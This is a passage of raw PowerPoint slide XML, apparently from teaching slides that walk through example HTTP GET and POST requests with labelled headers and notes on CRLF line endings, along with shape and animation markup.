        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Speech Bubble: Rectangle 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C99EEA2F-F43D-C2F0-621F-5BD9FCC038C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7614638" y="2201221"/>
            <a:ext cx="3601117" cy="1227779"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -61357"/>
              <a:gd name="adj2" fmla="val 9654"/>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t>Every line ends with Carriage Return (\r) and Line Feed (\n) characters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Speech Bubble: Rectangle 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EB4781E-E19B-D7D6-B1B0-700ED02DC093}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6879143" y="4059099"/>
            <a:ext cx="3601117" cy="921380"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -109197"/>
              <a:gd name="adj2" fmla="val 3901"/>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t>Every request ends with an additional \r\n</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37739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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="42"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16"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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23"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2"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BD758B61-EF43-4466-B9AD-44C28DEA9E46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3493828" y="2083558"/>
            <a:ext cx="0" cy="4640239"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:prstDash val="sysDot"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BACD054E-657B-4998-AA03-CB9AAF7E231C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP GET Request Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E364D5B5-7563-4F9D-8D72-C13A561D6D8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2383809"/>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Method, resource, and version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60DEBC3B-0494-444E-A0BC-06344BEE90F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24426" y="2779595"/>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Accepted file types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE4FF9BF-4EEE-4F91-BD56-10DB70285F27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24427" y="3132162"/>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Your browser and OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45812494-9C39-4B23-AD77-382C00E2875E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24428" y="3484729"/>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Compressed responses?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CAF1458-FABD-4CAF-904E-A0FCEEF5B727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24423" y="3837296"/>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Your preferred language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D950D18C-371A-4560-82E6-12E97E20B469}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24429" y="4189864"/>
            <a:ext cx="3484729" cy="3457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Previous site you were browsing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBCE0F1D-100E-49E2-96C1-824866552179}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="2329218"/>
            <a:ext cx="6496334"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62A0D402-6E2B-418F-B8FD-6148B88465BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121153" y="2704782"/>
            <a:ext cx="8179558"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DFD32AC3-104D-4952-ABBA-D821B9D30FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121153" y="3030052"/>
            <a:ext cx="11900848"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11381139-CC8D-435D-89CD-7BCC009F026C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116604" y="3375156"/>
            <a:ext cx="763819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68A1BFC4-7496-4DA3-93D2-A7C9910BE324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121153" y="3734547"/>
            <a:ext cx="763819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268A5AE7-C233-44C3-BA3C-AA0BEABA0F9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116604" y="4093689"/>
            <a:ext cx="763819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Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21E2F459-88E3-88E3-F941-760BE3F84769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="2401759"/>
            <a:ext cx="380658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GET /index.html HTTP/0.9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE88B09A-AD2E-A819-4C29-2E57666AE775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="2811069"/>
            <a:ext cx="6770007"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Accept: text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>html,application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xhtml+xml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B611A1C-78AB-BF95-8F52-8FE7F2622DCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="3149692"/>
            <a:ext cx="8215813" cy="29051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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/65.0.3323.51</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66567261-B7E1-847B-AFD7-FBF2D24BA5EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="3512344"/>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Accept-Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gzip,deflate,sdch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA1CC72E-2EE4-1CD3-9A98-048980475507}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="3862482"/>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Accept-Language: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>en-US,en;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=0.8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41ADC015-BF7F-0A02-B22D-8B059C5C799B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="4238944"/>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err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: www.google.com/search</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42518201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1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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xit" presetSubtype="21" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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xit" presetSubtype="21" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="49" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="50" presetID="16" presetClass="entr" presetSubtype="21"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15" grpId="1" animBg="1"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="1" animBg="1"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="1" animBg="1"/>
      <p:bldP spid="18" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="1"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BD758B61-EF43-4466-B9AD-44C28DEA9E46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3493828" y="2083558"/>
            <a:ext cx="0" cy="4640239"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:prstDash val="sysDot"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BACD054E-657B-4998-AA03-CB9AAF7E231C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP POST Request Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E364D5B5-7563-4F9D-8D72-C13A561D6D8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2206680"/>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Method, resource, and version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60DEBC3B-0494-444E-A0BC-06344BEE90F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24426" y="2602466"/>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Accepted file types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE4FF9BF-4EEE-4F91-BD56-10DB70285F27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24427" y="2955033"/>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Your browser and OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45812494-9C39-4B23-AD77-382C00E2875E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24428" y="3307600"/>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Compressed responses?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CAF1458-FABD-4CAF-904E-A0FCEEF5B727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24423" y="3660167"/>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Your preferred language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D950D18C-371A-4560-82E6-12E97E20B469}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24429" y="4012735"/>
            <a:ext cx="3484729" cy="3457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Previous site you were browsing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBCE0F1D-100E-49E2-96C1-824866552179}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145575" y="2152089"/>
            <a:ext cx="714568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62A0D402-6E2B-418F-B8FD-6148B88465BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121153" y="2527653"/>
            <a:ext cx="8179558"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DFD32AC3-104D-4952-ABBA-D821B9D30FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121153" y="2852923"/>
            <a:ext cx="11900848"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11381139-CC8D-435D-89CD-7BCC009F026C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116604" y="3198027"/>
            <a:ext cx="763819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68A1BFC4-7496-4DA3-93D2-A7C9910BE324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121153" y="3557418"/>
            <a:ext cx="763819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268A5AE7-C233-44C3-BA3C-AA0BEABA0F9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116604" y="3916560"/>
            <a:ext cx="763819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Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21E2F459-88E3-88E3-F941-760BE3F84769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="2224630"/>
            <a:ext cx="380658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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new_account.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> HTTP/0.9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE88B09A-AD2E-A819-4C29-2E57666AE775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="2633940"/>
            <a:ext cx="6770007"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Accept: text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>html,application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
